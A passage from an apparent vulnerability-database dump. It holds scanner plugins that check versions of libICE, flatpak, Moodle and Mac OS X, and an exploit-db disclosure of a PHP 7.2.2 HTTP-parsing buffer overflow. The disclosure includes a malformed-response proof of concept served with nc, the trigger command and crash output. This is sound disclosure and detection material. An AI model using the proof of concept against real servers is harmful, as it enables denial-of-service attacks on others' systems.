reference:\"libICE6-debuginfo-1.0.8-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libICE6-debuginfo-32bit-1.0.8-10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libICE\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:32:19", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2019-03-01T00:00:00", "id": "OPENVAS:1361412562310875482", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875482", "title": "Fedora Update for flatpak FEDORA-2019-a5f616808e", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875482\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2019-5736\", \"CVE-2019-8308\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-03-01 04:17:26 +0100 (Fri, 01 Mar 2019)\");\n script_name(\"Fedora Update for flatpak FEDORA-2019-a5f616808e\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-a5f616808e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZZ5H7RY4AI4DNSISDE6BZTZHYJFQQQZK\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flatpak'\n package(s) announced via the FEDORA-2019-a5f616808e advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"flatpak on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"flatpak\", rpm:\"flatpak~1.0.7~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-04T18:46:31", "bulletinFamily": "scanner", "description": "It was discovered that Flatpak, an application deployment framework for\ndesktop apps, insufficiently restricted the execution of apply_extra\nscripts which could potentially result in privilege escalation.\n\n This vulnerability is similar to the runc CVE-2019-5736 vulnerability found within docker.", "modified": "2019-07-04T00:00:00", "published": "2019-02-12T00:00:00", "id": "OPENVAS:1361412562310704390", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704390", "title": "Debian Security Advisory DSA 4390-1 (flatpak - security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704390\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2019-8308\");\n script_name(\"Debian Security Advisory DSA 4390-1 (flatpak - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-02-12 00:00:00 +0100 (Tue, 12 Feb 2019)\");\n script_tag(name:\"cvss_base\", value:\"4.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4390.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"flatpak on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 0.8.9-0+deb9u2.\n\nWe recommend that you upgrade your flatpak packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/flatpak\");\n script_tag(name:\"summary\", value:\"It was discovered that Flatpak, an application deployment framework for\ndesktop apps, insufficiently restricted the execution of apply_extra\nscripts which could potentially result in privilege escalation.\n\n This vulnerability is similar to the runc CVE-2019-5736 vulnerability found within docker.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"flatpak\", ver:\"0.8.9-0+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"flatpak-builder\", ver:\"0.8.9-0+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"flatpak-tests\", ver:\"0.8.9-0+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"gir1.2-flatpak-1.0\", ver:\"0.8.9-0+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libflatpak-dev\", ver:\"0.8.9-0+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libflatpak-doc\", ver:\"0.8.9-0+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libflatpak0\", ver:\"0.8.9-0+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-09T14:49:06", "bulletinFamily": "scanner", "description": "Moodle CMS is prone to multiple vulnerabilities.", "modified": "2019-10-07T00:00:00", "published": "2018-05-29T00:00:00", "id": "OPENVAS:1361412562310113200", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113200", "title": "Moodle 3.x Multiple Vulnerabilities - May'18 (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Moodle 3.x Multiple Vulnerabilities - May'18 (Linux)\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113200\");\n script_version(\"2019-10-07T14:34:48+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-07 14:34:48 +0000 (Mon, 07 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-29 10:06:08 +0200 (Tue, 29 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-1133\", \"CVE-2018-1134\", \"CVE-2018-1135\", \"CVE-2018-1136\", \"CVE-2018-1137\");\n\n script_name(\"Moodle 3.x Multiple Vulnerabilities - May'18 (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Moodle CMS is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - A Teacher creating a Calculated question can intentionally cause remote code execution on the server, aka eval injection.\n\n - Students who submitted assignments and exported them to portfolios can download any stored Moodle file\n by changing the download URL.\n\n - Students who posted on forums and exported the posts to portfolios can download any stored Moodle file\n by changing the download URL.\n\n - An authenticated user is allowed to add HTML blocks containing scripts to their Dashboard.\n This is normally not a security issue because a personal dashboard is visible to this user only.\n Through this security vulnerability,\n users can move such a block to other pages where they can be viewed by other users.\n\n - By substituting URLs in portfolios, users can instantiate any class.\n This can also be exploited by users who are logged in as guests to create a DDoS attack.\");\n script_tag(name:\"impact\", value:\"Successful exploitation can have effects ranging from Denial of Service, over file access to\n the attacker gaining complete control over the target system.\");\n script_tag(name:\"affected\", value:\"Moodle versions before 3.1.11, 3.2.0 through 3.2.8, 3.3.0 through 3.3.5 and 3.4.0 through 3.4.2.\");\n script_tag(name:\"solution\", value:\"Update to version 3.1.12, 3.2.9, 3.3.6 or 3.4.3 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371199\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371200\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371201\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371202\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371203\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371204\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\n\nversion = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version: version, test_version: \"3.1.12\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.1.12\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.2.8\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.9\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.3.0\", test_version2: \"3.3.5\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.3.6\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.4.0\", test_version2: \"3.4.2\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.4.3\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-10-09T14:49:06", "bulletinFamily": "scanner", "description": "Moodle CMS is prone to multiple vulnerabilities.", "modified": "2019-10-07T00:00:00", "published": "2018-05-29T00:00:00", "id": "OPENVAS:1361412562310113201", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113201", "title": "Moodle 3.x Multiple Vulnerabilities - May'18 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Moodle 3.x Multiple Vulnerabilities - May'18 (Windows)\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113201\");\n script_version(\"2019-10-07T14:34:48+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-07 14:34:48 +0000 (Mon, 07 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-29 10:06:08 +0200 (Tue, 29 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-1133\", \"CVE-2018-1134\", \"CVE-2018-1135\", \"CVE-2018-1136\", \"CVE-2018-1137\");\n\n script_name(\"Moodle 3.x Multiple Vulnerabilities - May'18 (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_moodle_cms_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"moodle/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Moodle CMS is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - A Teacher creating a Calculated question can intentionally cause remote code execution on the server, aka eval injection.\n\n - Students who submitted assignments and exported them to portfolios can download any stored Moodle file\n by changing the download URL.\n\n - Students who posted on forums and exported the posts to portfolios can download any stored Moodle file\n by changing the download URL.\n\n - An authenticated user is allowed to add HTML blocks containing scripts to their Dashboard.\n This is normally not a security issue because a personal dashboard is visible to this user only.\n Through this security vulnerability,\n users can move such a block to other pages where they can be viewed by other users.\n\n - By substituting URLs in portfolios, users can instantiate any class.\n This can also be exploited by users who are logged in as guests to create a DDoS attack.\");\n script_tag(name:\"impact\", value:\"Successful exploitation can have effects ranging from Denial of Service, over file access to\n the attacker gaining complete control over the target system.\");\n script_tag(name:\"affected\", value:\"Moodle versions before 3.1.11, 3.2.0 through 3.2.8, 3.3.0 through 3.3.5 and 3.4.0 through 3.4.2.\");\n script_tag(name:\"solution\", value:\"Update to version 3.1.12, 3.2.9, 3.3.6 or 3.4.3 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371199\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371200\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371201\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371202\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371203\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=371204\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\n\nversion = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version: version, test_version: \"3.1.12\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.1.12\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.2.8\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.2.9\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.3.0\", test_version2: \"3.3.5\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.3.6\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.4.0\", test_version2: \"3.4.2\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.4.3\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:09", "bulletinFamily": "scanner", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "modified": "2019-05-03T00:00:00", "published": "2015-04-24T00:00:00", "id": "OPENVAS:1361412562310805601", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805601", "title": "Apple Mac OS X Multiple Vulnerabilities-01 Apr15", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-01 Apr15\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805601\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2015-1130\", \"CVE-2015-1131\", \"CVE-2015-1132\", \"CVE-2015-1133\",\n \"CVE-2015-1134\", \"CVE-2015-1135\", \"CVE-2015-1136\", \"CVE-2015-1088\",\n \"CVE-2015-1089\", \"CVE-2015-1091\", \"CVE-2015-1093\", \"CVE-2015-1137\",\n \"CVE-2015-1138\", \"CVE-2015-1139\", \"CVE-2015-1140\", \"CVE-2015-1141\",\n \"CVE-2015-1142\", \"CVE-2015-1143\", \"CVE-2015-1144\", \"CVE-2015-1145\",\n \"CVE-2015-1146\", \"CVE-2015-1147\", \"CVE-2015-1148\", \"CVE-2015-1095\",\n \"CVE-2015-1098\", \"CVE-2015-1099\", \"CVE-2015-1100\", \"CVE-2015-1101\",\n \"CVE-2015-1102\", \"CVE-2015-1103\", \"CVE-2015-1104\", \"CVE-2015-1105\",\n \"CVE-2015-1117\", \"CVE-2015-1118\");\n script_bugtraq_id(73982, 73984, 72328, 73981);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-04-24 15:41:40 +0530 (Fri, 24 Apr 2015)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-01 Apr15\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists. For details refer\n reference section.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow local\n attacker to execute arbitrary code with system privilege, man-in-the-middle\n attack, remote attacker to bypass network filters, to cause a denial of\n service, a context-dependent attacker to corrupt memory and cause a denial of\n service, bypass signature validation or potentially execute arbitrary code, a\n local application to gain elevated privileges by using a compromised service\n and some unspecified impacts.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions 10.8 through\n 10.8.5, 10.9 through 10.9.5, and 10.10.x through 10.10.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version 10.10.3\n or later or apply security update 2015-004 for 10.8 and 10.9 versions. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/kb/HT204659\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.([89]|10)\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.([89]|10)\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nif((osVer == \"10.8.5\") || (osVer == \"10.9.5\"))\n{\n buildVer = get_kb_item(\"ssh/login/osx_build\");\n if(!buildVer){\n exit(0);\n }\n\n if(osVer == \"10.8.5\" && version_is_less(version:buildVer, test_version:\"12F2518\"))\n {\n fix = \"Apply Security Update 2015-004\";\n osVer = osVer + \" Build \" + buildVer;\n }\n\n else if(osVer == \"10.9.5\" && version_is_less(version:buildVer, test_version:\"13F1077\"))\n {\n fix = \"Apply Security Update 2015-004\";\n osVer = osVer + \" Build \" + buildVer;\n }\n}\n\nif(osVer =~ \"^10\\.8\")\n{\n if(version_is_less(version:osVer, test_version:\"10.8.5\")){\n fix = \"Upgrade to latest OS release 10.8.5 and apply patch from vendor\";\n }\n}\nelse if(osVer =~ \"^10\\.9\")\n{\n if(version_is_less(version:osVer, test_version:\"10.9.5\")){\n fix = \"Upgrade to latest OS release 10.9.5 and apply patch from vendor\";\n }\n}\n\nelse if(osVer =~ \"^10\\.10\")\n{\n if(version_is_less(version:osVer, test_version:\"10.10.3\")){\n fix = \"10.10.3\";\n }\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2018-06-06T12:20:24", "bulletinFamily": "exploit", "description": "PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow. CVE-2018-7584. Dos exploit for PHP platform", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "EDB-ID:44846", "href": "https://www.exploit-db.com/exploits/44846/", "type": "exploitdb", "title": "PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow", "sourceData": "Description:\r\n------------\r\nThe latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at:\r\n\r\nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n\r\n\t\t\tif (tmp_line[tmp_line_len - 1] == '\\n') {\r\n\t\t\t\t--tmp_line_len;\r\n\t\t\t\tif (tmp_line[tmp_line_len - 1] == '\\r') {\r\n\t\t\t\t\t--tmp_line_len;\r\n\t\t\t\t}\r\n}\r\n\r\nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed.\r\n\r\n$ bin/php --version\r\nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )\r\nCopyright (c) 1997-2018 The PHP Group\r\nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies\r\n\r\n\r\nTest script:\r\n---------------\r\n$ xxd -g 1 poc\r\n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..\r\n\r\n$ nc -vvlp 8080 < poc\r\nListening on [0.0.0.0] (family 0, port 8080)\r\nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)\r\nGET / HTTP/1.0\r\nHost: localhost:8080\r\nConnection: close\r\n\r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n\r\nExpected result:\r\n----------------\r\nNO CRASH\r\n\r\nActual result:\r\n--------------\r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n=================================================================\r\n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac\r\nREAD of size 1 at 0xbfc038ef thread T0\r\n #0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n #1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979\r\n #2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027\r\n #3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550\r\n #4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224\r\n #5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573\r\n #6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731\r\n #7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760\r\n #8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082\r\n #9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123\r\n #10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134\r\n #11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042\r\n #12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404\r\n #13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)\r\n #14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)\r\nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack:\r\n This frame has 13 object(s):\r\n [32, 36) 'transport_string'\r\n [96, 100) 'errstr'\r\n [160, 164) 'http_header_line_length'\r\n [224, 232) 'timeout'\r\n [288, 296) 'req_buf'\r\n [352, 360) 'tmpstr'\r\n [416, 432) 'ssl_proxy_peer_name'\r\n [480, 